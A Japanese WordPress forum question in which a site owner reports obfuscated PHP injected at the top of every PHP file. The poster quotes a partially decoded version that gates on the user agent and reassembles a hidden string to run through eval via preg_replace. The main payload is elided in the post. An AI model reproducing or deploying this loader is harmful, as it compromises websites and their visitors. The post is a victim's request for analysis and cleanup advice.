身に覚えのないコード(エンコードされている)が挿入されている
-
アップデートなどせず運用していたWPサイトのプラグインが全く機能していない事に気が付き
調査をしていたら下記のコードが全phpファイルの先頭に書き込まれておりました。
コードとしては↓この様な感じです。
<?php if(!isset($GLOBALS[“\x61\156\x75\156\x61”]))
これをphpOnlineDecodeに投じてデコードを試みたものが下記になります。<?php if (!isset($GLOBALS["anuna"])) { $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1; } ?><?php $hffxhmlttm = 'x78256<*17-SFEBFI,6<*127-UVPFNJU,【1万字ほど省略文末にはヒントがありそう】y3d/(.*)/epreg_replaceftzxngaiix'; $xbnwltcbcx = explode(chr((205 - 161)), '7992,42,9245,45,6675,【200次ほど省略2ケタと4ケタの数字が交互にカンマ区切りされている】,8912,7'); $mahiqelreb = substr($hffxhmlttm, (67447 - 57341), (34 - 27)); if (!function_exists('palfzsezij')) { function palfzsezij($itsehmabdb, $znmqposwqq) { $vrzlhafpnj = NULL; for ($pigxxxowuw = 0;$pigxxxowuw < (sizeof($itsehmabdb) / 2);$pigxxxowuw++) { $vrzlhafpnj.= substr($znmqposwqq, $itsehmabdb[($pigxxxowuw * 2) ], $itsehmabdb[($pigxxxowuw * 2) + 1]); } return $vrzlhafpnj; }; } $scxpvzibci = " /* biqsjaruty */ eval(str_replace(chr((209-172)), chr((478-386)), palfzsezij($xbnwltcbcx,$hffxhmlttm))); /* eypvhvtgom */ "; $ndjzfoeczp = substr($hffxhmlttm, (41047 - 30934), (68 - 56)); $ndjzfoeczp($mahiqelreb, $scxpvzibci, NULL); $ndjzfoeczp = $scxpvzibci; $ndjzfoeczp = (610 - 489); $hffxhmlttm = $ndjzfoeczp - 1; ?>
プラグイン全部消えた件についての詳細は
wp-content/plugin/
には存在している。
管理画面からインストール済みプラグインを見ると白紙。
プラグインを再度入れようとすると存在しているためにインストールできません、
となりFTPで繋いで一度消してから再度入れなおすと各設定項目は消えていない。SSHで繋いでタイムスタンプを確認したところ不審なコードの挿入の日時はおそらく反映されていない。
となります。
コードを消して、プラグインを入れなおして、そのまま放置しているとこの症状が再発します。
現在ローカルMAMP環境にそのままコピーして色々と観察、考察を行っております。そこで質問なのですがこのコードは何をしようとしているのでしょうか?
感染経路はSSHでしょうか、それともXmlrpc経由のSql書き換えになるのでしょうか?近々WPの引っ越しを考えているのですが、どういった手を打てば新しい環境で再発しなくなるでしょうか?
ご存知のかたよろしくお願い致します。
4件の返信を表示中 - 1 - 4件目 (全4件中)
4件の返信を表示中 - 1 - 4件目 (全4件中)
- トピック「身に覚えのないコード(エンコードされている)が挿入されている」には新たに返信することはできません。